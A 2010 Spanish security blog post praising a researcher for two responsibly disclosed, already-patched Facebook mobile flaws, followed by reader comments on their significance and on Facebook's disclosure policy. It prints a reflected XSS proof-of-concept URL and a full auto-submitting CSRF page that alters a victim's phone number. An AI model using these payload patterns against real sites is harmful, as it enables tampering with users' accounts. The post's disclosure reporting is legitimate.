16 febrero 2010

Hackeos memorables. Juan Galiana, el amigo de Facebook.

Tuvimos el placer de conocer a Juan Galiana (twitter) en el concurso de seguridad que organizamos en la Campus Party de Valencia el año pasado. Juan, quedó el segundo y resolvió las pruebas  más difíciles con gran ingenio. Además, se preocupó y no paró hasta averiguar las respuestas de todas aquellas que dejo pendientes.

Galiana, que trabaja como consultor de seguridad en IsecAuditors está dando últimamente algún que otro dolor de cabeza a los administradores de seguridad de Facebook y es que en lo que va de año ya ha publicado dos vulnerabilidades en la sobrevalorada red social. Todo un hackeo memorable.

La primera de ellas, un XSS que permitía la inserción de código HTML o javascript que encontró el 2 de enero y no liberó públicamente el fallo hasta que lo solucionaron un mes después (3 febrero). Aunque según parece y dicta su nota con la línea temporal, sin demasiado interés.

La vulnerabilidad estaba en uno de los parámetros de la versión móvil de la aplicación:

http://m.facebook.com/friends.php?q=%3Cscript%3Ealert(%22XSS%22)%3B%3C%2Fscript%3E
El segundo problema era más complejo, se trataba de un CSRF que permitía la modificación de los datos de un usuario si este se encontraba autenticado en la parte móvil y era engañado para cargar una página web con un contenido similar al siguiente:

<html>
<head>
<script>
function send() {
document.forms[0].submit();
}
</script>
</head>
<body onload="send();">
<form
action="http://m.facebook.com/a/editprofile.php?edit=phone_cell&type=contact";
method="post">
<input type="hidden" name="phone_num" value="600000000">
<input type="hidden" name="save" value="">
</form>
</body>
</html>

Nuevamente, la publicó el día 12 de febrero una vez a habían solucionado, pero esta vez tardando mucho menos.

En la intimidad nos ha confesado que sigue esperando a que arreglen algunos fallos  más para seguir mostrándonos sus vergüenzas.
Eso sí, ha conseguido pasar de ser una persona a la que prestaban poca atención, a formar parte de los agradecimientos que la propia compañía muestra en su página a todos aquellos que siguen su política de publicación responsable.

Desde SbD, ¡enhorabuena Juan!

14 comments :

Rubén dijo...

Tres hurras por Juan! enhorabuena.

Anónimo dijo...

hackeo memorable un xss y csrf por favor donde estamos hay gente q encuntra bug mas iguales q este y no por eso se le da el titulo de hackeo memorable donde estamos

Alejandro Ramos dijo...

@Anónimo: no solo es el tipo de fallo, si no donde.

¿Cuales son los tuyos?

Gracias por tu comentario.

Román Ramírez dijo...

Y, desde luego, en la mentalidad del hacker debe estar el aprovechar lo que puedas para escalar todos los privilegios a tu alcance.

¿Es menos importante un XSS o un CSRF que descubrir una contraseña por defecto o un mmap a null? Menuda chorrada.

Anónimo dijo...

¿Alguien ha leído la Responsible Disclosure Policy del enlace de SbD?. Porque la parte que dice: "To make researchers feel comfortable bringing issues to our attention, we have adopted the following responsible reporting policy: If you share details of a security issue with us and give us a reasonable period of time to respond to it before making it public, and have not conducted research that would violate the terms of our Statement of Rights and Responsibilities, we will not bring any lawsuit against you or ask law enforcement to investigate you for that research.", es desde luego para sentirse super cómodo.


Enhorabuena por el blog.
Exquisito :)

Anónimo dijo...

Es dónde lo ha encontrado y qué ha hecho con él. Tiene bastante más mérito y es más útil que poner su nombre en la página principal de un cc.

lost-perdidos dijo...

@Anónimo 1

Y qué hackeo ibas a esperar, este es un blogspot "entre amigos".

Dreg dijo...

Congratz Juan! :-)

Alejandro Ramos dijo...

@lost-perdidos, no te sigo y me encataría que dejaras tu opinión algo más clara para poder contestar.

Un saludo

svoboda dijo...

Juan es un gran tipo, la última vez que lo vi, me respondio varias preguntas muy amablemente.

Esas pruebas de la campus party, ¿están accesibles en algún lado? y, ¿sus soluciones por si nos atascamos mucho?

PD: Quizás el comentario salga repetido, ya que lo escribí ayer sobre las 8 de la mañana, pero al ver que no sale, he decidido reescribirlo.

Yago Jesus dijo...

@svoboda Al final localizamos el comentario (desastre de blogger ...) Sobre lo que dices de la campus, si ojeas por este tag http://www.securitybydefault.com/search/label/campus%20party%202009 está toda la info de las pruebas

svoboda dijo...

@Yago Jesus. Gracias por mirarlo, y por la respuesta.

svoboda dijo...

@Yago Jesus. Gracias por mirarlo, y por la respuesta.

Rubén dijo...

Tres hurras por Juan! enhorabuena.